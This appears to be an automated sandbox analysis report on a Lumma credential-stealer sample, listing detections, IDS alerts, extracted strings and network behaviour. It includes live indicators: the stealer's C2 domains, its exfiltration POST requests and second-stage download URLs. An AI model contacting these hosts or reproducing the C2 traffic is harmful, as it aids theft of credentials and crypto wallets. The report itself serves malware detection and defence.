Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BDxsBr8Dce.exe

Overview

General Information

Sample name:BDxsBr8Dce.exe
renamed because original name is a hash value
Original sample name:88a3030a577480dfb9a870e40d94fe78ed3c66408332a76178c3efcb26a9b91b.exe
Analysis ID:1574812
MD5:94842b12f4a0647db302a5acd53758d7
SHA1:fde1a2115a054c42a829b3de5351cce9cfeeb564
SHA256:88a3030a577480dfb9a870e40d94fe78ed3c66408332a76178c3efcb26a9b91b
Tags:exeimmureprech-bizuser-JAMESWT_MHT
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • BDxsBr8Dce.exe (PID: 7560 cmdline: "C:\Users\user\Desktop\BDxsBr8Dce.exe" MD5: 94842B12F4A0647DB302A5ACD53758D7)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["wrathful-jammy.cyou", "sordid-snaked.cyou", "immureprech.biz", "deafeninggeh.biz", "poweryressz.click", "diffuculttan.xyz", "debonairnukk.xyz", "effecterectz.xyz", "awake-weaves.cyou"], "Build id": "Dvh8ui--n9"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000002.3236849653.0000000001C10000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
      • 0x30d5e:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
      • 0x342f4:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
      Process Memory Space: BDxsBr8Dce.exe PID: 7560JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: BDxsBr8Dce.exe PID: 7560JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: BDxsBr8Dce.exe PID: 7560JoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
            Process Memory Space: BDxsBr8Dce.exe PID: 7560JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
              Click to see the 1 entries
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-13T16:48:32.535328+010020283713Unknown Traffic192.168.2.949759172.67.149.196443TCP
              2024-12-13T16:48:34.907796+010020283713Unknown Traffic192.168.2.949765172.67.149.196443TCP
              2024-12-13T16:48:37.234976+010020283713Unknown Traffic192.168.2.949771172.67.149.196443TCP
              2024-12-13T16:48:39.351048+010020283713Unknown Traffic192.168.2.949777172.67.149.196443TCP
              2024-12-13T16:48:41.878343+010020283713Unknown Traffic192.168.2.949783172.67.149.196443TCP
              2024-12-13T16:48:44.254581+010020283713Unknown Traffic192.168.2.949789172.67.149.196443TCP
              2024-12-13T16:48:46.733955+010020283713Unknown Traffic192.168.2.949796172.67.149.196443TCP
              2024-12-13T16:48:51.077620+010020283713Unknown Traffic192.168.2.949807172.67.149.196443TCP
              2024-12-13T16:48:53.767762+010020283713Unknown Traffic192.168.2.949813172.67.182.135443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-13T16:48:33.621155+010020546531A Network Trojan was detected192.168.2.949759172.67.149.196443TCP
              2024-12-13T16:48:35.644593+010020546531A Network Trojan was detected192.168.2.949765172.67.149.196443TCP
              2024-12-13T16:48:52.094534+010020546531A Network Trojan was detected192.168.2.949807172.67.149.196443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-13T16:48:33.621155+010020498361A Network Trojan was detected192.168.2.949759172.67.149.196443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-13T16:48:35.644593+010020498121A Network Trojan was detected192.168.2.949765172.67.149.196443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-13T16:48:38.007977+010020480941Malware Command and Control Activity Detected192.168.2.949771172.67.149.196443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: https://kliplorihoe0.shop/int_clp_ldr_pan.txt537.36Avira URL Cloud: Label: malware
              Source: https://kliplorihoe0.shop/int_clp_ldr_pan.txtfuAvira URL Cloud: Label: malware
              Source: https://slotwang.com/file/SigmaHealth.exeAvira URL Cloud: Label: malware
              Source: https://kliplorihoe0.shop/int_clp_ldr_pan.txtAvira URL Cloud: Label: malware
              Source: BDxsBr8Dce.exe.7560.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["wrathful-jammy.cyou", "sordid-snaked.cyou", "immureprech.biz", "deafeninggeh.biz", "poweryressz.click", "diffuculttan.xyz", "debonairnukk.xyz", "effecterectz.xyz", "awake-weaves.cyou"], "Build id": "Dvh8ui--n9"}
              Source: BDxsBr8Dce.exeReversingLabs: Detection: 26%
              Source: 00000000.00000002.3237395177.00000000038C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: sordid-snaked.cyou
              Source: 00000000.00000002.3237395177.00000000038C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: awake-weaves.cyou
              Source: 00000000.00000002.3237395177.00000000038C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: wrathful-jammy.cyou
              Source: 00000000.00000002.3237395177.00000000038C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: debonairnukk.xyz
              Source: 00000000.00000002.3237395177.00000000038C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: diffuculttan.xyz
              Source: 00000000.00000002.3237395177.00000000038C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: effecterectz.xyz
              Source: 00000000.00000002.3237395177.00000000038C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: deafeninggeh.biz
              Source: 00000000.00000002.3237395177.00000000038C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: immureprech.biz
              Source: 00000000.00000002.3237395177.00000000038C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: poweryressz.click
              Source: 00000000.00000002.3237395177.00000000038C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.3237395177.00000000038C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.3237395177.00000000038C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.3237395177.00000000038C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.3237395177.00000000038C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.3237395177.00000000038C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: Dvh8ui--n9
              Source: BDxsBr8Dce.exe, 00000000.00000000.1391586259.0000000001336000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_15d52235-4
              Source: BDxsBr8Dce.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 172.67.149.196:443 -> 192.168.2.9:49759 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.149.196:443 -> 192.168.2.9:49765 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.149.196:443 -> 192.168.2.9:49771 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.149.196:443 -> 192.168.2.9:49777 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.149.196:443 -> 192.168.2.9:49783 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.149.196:443 -> 192.168.2.9:49789 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.149.196:443 -> 192.168.2.9:49796 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.149.196:443 -> 192.168.2.9:49807 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.182.135:443 -> 192.168.2.9:49813 version: TLS 1.2
              Source: BDxsBr8Dce.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_010925E0 FindFirstFileExW,FindNextFileW,0_2_010925E0
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_01088B40 FindFirstFileW,FindClose,0_2_01088B40

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49759 -> 172.67.149.196:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:49765 -> 172.67.149.196:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.9:49771 -> 172.67.149.196:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49759 -> 172.67.149.196:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49765 -> 172.67.149.196:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49807 -> 172.67.149.196:443
              Source: Malware configuration extractorURLs: wrathful-jammy.cyou
              Source: Malware configuration extractorURLs: sordid-snaked.cyou
              Source: Malware configuration extractorURLs: immureprech.biz
              Source: Malware configuration extractorURLs: deafeninggeh.biz
              Source: Malware configuration extractorURLs: poweryressz.click
              Source: Malware configuration extractorURLs: diffuculttan.xyz
              Source: Malware configuration extractorURLs: debonairnukk.xyz
              Source: Malware configuration extractorURLs: effecterectz.xyz
              Source: Malware configuration extractorURLs: awake-weaves.cyou
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49765 -> 172.67.149.196:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49759 -> 172.67.149.196:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49771 -> 172.67.149.196:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49777 -> 172.67.149.196:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49783 -> 172.67.149.196:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49796 -> 172.67.149.196:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49789 -> 172.67.149.196:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49807 -> 172.67.149.196:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49813 -> 172.67.182.135:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: poweryressz.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 44Host: poweryressz.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LF3JRMQT9WPUCMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12818Host: poweryressz.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SWENWZFFY5454User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15030Host: poweryressz.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=IFJRN7LXLE8J2KVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20558Host: poweryressz.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=EX9TJ7CM5S7CA20MLJJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1228Host: poweryressz.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=FG4GJ0RIJOUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 556068Host: poweryressz.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 79Host: poweryressz.click
              Source: global trafficHTTP traffic detected: GET /int_clp_ldr_pan.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: kliplorihoe0.shop
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /int_clp_ldr_pan.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: kliplorihoe0.shop
              Source: BDxsBr8Dce.exeString found in binary or memory: 04:7e:cb:e9:fc:a5:5f:7b:d0:9e:ae:36:e1:0c:ae:1email.google.comf5:c8:6a:f3:61:62:f1:3a:64:f5:4f:6d:c9:58:7c:06www.google.comd7:55:8f:da:f5:f1:10:5b:b2:13:28:2b:70:77:29:a3login.yahoo.com39:2a:43:4f:0e:07:df:1f:8a:a3:05:de:34:e0:c2:293e:75:ce:d4:6b:69:30:21:21:88:30:ae:86:a8:2a:71e9:02:8b:95:78:e4:15:dc:1a:71:0a:2b:88:15:44:47login.skype.com92:39:d5:34:8f:40:d1:69:5a:74:54:70:e1:f2:3f:43addons.mozilla.orgb0:b7:13:3e:d0:96:f9:b5:6f:ae:91:c8:74:bd:3a:c0login.live.comd8:f3:5f:4e:b7:87:2b:2d:ab:06:92:e3:15:38:2f:b0global trustee05:e2:e6:a4:cd:09:ea:54:d6:65:b0:75:fe:22:a2:56*.google.com0c:76:da:9c:91:0c:4e:2c:9e:fe:15:d0:58:93:3c:4cDigiNotar Root CAf1:4a:13:f4:87:2b:56:dc:39:df:84:ca:7a:a1:06:49DigiNotar Services CA36:16:71:55:43:42:1b:9d:e6:cb:a3:64:41:df:24:38DigiNotar Services 1024 CA0a:82:bd:1e:14:4e:88:14:d7:5b:1a:55:27:be:bf:3eDigiNotar Root CA G2a4:b6:ce:e3:2e:d3:35:46:26:3c:b3:55:3a:a8:92:21CertiID Enterprise Certificate Authority5b:d5:60:9c:64:17:68:cf:21:0e:35:fd:fb:05:ad:41DigiNotar Qualified CA46:9c:2c:b007:27:10:0dDigiNotar Cyber CA07:27:0f:f907:27:10:0301:31:69:b0DigiNotar PKIoverheid CA Overheid en Bedrijven01:31:34:bfDigiNotar PKIoverheid CA Organisatie - G2d6:d0:29:77:f1:49:fd:1a:83:f2:b9:ea:94:8c:5c:b4DigiNotar Extended Validation CA1e:7d:7a:53:3d:45:30:41:96:40:0f:71:48:1f:45:04DigiNotar Public CA 202546:9c:2c:af46:9c:3c:c907:27:14:a9Digisign Server ID (Enrich)4c:0e:63:6aDigisign Server ID - (Enrich)72:03:21:05:c5:0c:08:57:3d:8e:a5:30:4e:fe:e8:b0UTN-USERFirst-Hardware41MD5 Collisions Inc. (http://www.phreedom.org/md5)08:27*.EGO.GOV.TR08:64e-islem.kktcmerkezbankasi.org03:1d:a7AC DG Tr equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: poweryressz.click
              Source: global trafficDNS traffic detected: DNS query: kliplorihoe0.shop
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: poweryressz.click
              Source: BDxsBr8Dce.exeString found in binary or memory: ftp://.mode
              Source: BDxsBr8Dce.exeString found in binary or memory: http://bugreports.qt.io/
              Source: BDxsBr8Dce.exeString found in binary or memory: http://bugreports.qt.io/Microsoft-IIS/4.Microsoft-IIS/5.Netscape-Enterprise/3.WebLogicRocketdetected
              Source: BDxsBr8Dce.exe, 00000000.00000003.1646404644.0000000004818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: BDxsBr8Dce.exe, 00000000.00000003.1646404644.0000000004818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: BDxsBr8Dce.exe, 00000000.00000003.1752180305.0000000001D57000.00000004.00000020.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000002.3237107985.0000000001D59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
              Source: BDxsBr8Dce.exe, 00000000.00000003.1646404644.0000000004818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: BDxsBr8Dce.exe, 00000000.00000003.1549536823.0000000004A94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
              Source: BDxsBr8Dce.exe, 00000000.00000003.1549536823.0000000004A94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
              Source: BDxsBr8Dce.exe, 00000000.00000003.1646404644.0000000004818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: BDxsBr8Dce.exe, 00000000.00000003.1646404644.0000000004818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: BDxsBr8Dce.exe, 00000000.00000003.1646404644.0000000004818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: BDxsBr8Dce.exe, 00000000.00000003.1646404644.0000000004818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: BDxsBr8Dce.exe, 00000000.00000003.1549536823.0000000004A94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
              Source: BDxsBr8Dce.exe, 00000000.00000003.1549536823.0000000004A94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
              Source: BDxsBr8Dce.exe, 00000000.00000003.1646404644.0000000004818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: BDxsBr8Dce.exe, 00000000.00000003.1646404644.0000000004818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: BDxsBr8Dce.exe, 00000000.00000003.1549536823.0000000004A94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
              Source: BDxsBr8Dce.exeString found in binary or memory: http://qt-project.org/
              Source: BDxsBr8Dce.exeString found in binary or memory: http://qt-project.org/xml/features/report-start-end-entity
              Source: BDxsBr8Dce.exeString found in binary or memory: http://qt-project.org/xml/features/report-whitespace-only-CharData
              Source: BDxsBr8Dce.exeString found in binary or memory: http://qt.digia.com/
              Source: BDxsBr8Dce.exeString found in binary or memory: http://qt.digia.com/Product/Licensing/
              Source: BDxsBr8Dce.exeString found in binary or memory: http://trolltech.com/xml/features/report-start-end-entity
              Source: BDxsBr8Dce.exeString found in binary or memory: http://trolltech.com/xml/features/report-whitespace-only-CharData
              Source: BDxsBr8Dce.exeString found in binary or memory: http://www.phreedom.org/md5)
              Source: BDxsBr8Dce.exeString found in binary or memory: http://www.phreedom.org/md5)08:27
              Source: BDxsBr8Dce.exe, 00000000.00000003.1646404644.0000000004818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: BDxsBr8Dce.exe, 00000000.00000003.1646404644.0000000004818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: BDxsBr8Dce.exeString found in binary or memory: http://xml.org/sax/features/namespace-prefixes
              Source: BDxsBr8Dce.exeString found in binary or memory: http://xml.org/sax/features/namespaces
              Source: BDxsBr8Dce.exeString found in binary or memory: http://xml.org/sax/features/namespaceshttp://xml.org/sax/features/namespace-prefixeshttp://trolltech
              Source: BDxsBr8Dce.exe, 00000000.00000003.1600138824.000000000479C000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1600209487.0000000004799000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1600292349.0000000004799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: BDxsBr8Dce.exe, 00000000.00000003.1647849824.00000000047E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.
              Source: BDxsBr8Dce.exe, 00000000.00000003.1647849824.00000000047E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta
              Source: BDxsBr8Dce.exe, 00000000.00000003.1600138824.000000000479C000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1600209487.0000000004799000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1600292349.0000000004799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: BDxsBr8Dce.exe, 00000000.00000003.1600138824.000000000479C000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1600209487.0000000004799000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1600292349.0000000004799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: BDxsBr8Dce.exe, 00000000.00000003.1600138824.000000000479C000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1600209487.0000000004799000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1600292349.0000000004799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: BDxsBr8Dce.exe, 00000000.00000003.1647849824.00000000047E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
              Source: BDxsBr8Dce.exe, 00000000.00000003.1647849824.00000000047E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: BDxsBr8Dce.exe, 00000000.00000003.1600138824.000000000479C000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1600209487.0000000004799000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1600292349.0000000004799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: BDxsBr8Dce.exe, 00000000.00000003.1600138824.000000000479C000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1600209487.0000000004799000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1600292349.0000000004799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: BDxsBr8Dce.exe, 00000000.00000003.1600138824.000000000479C000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1600209487.0000000004799000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1600292349.0000000004799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: BDxsBr8Dce.exe, 00000000.00000003.1647849824.00000000047E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
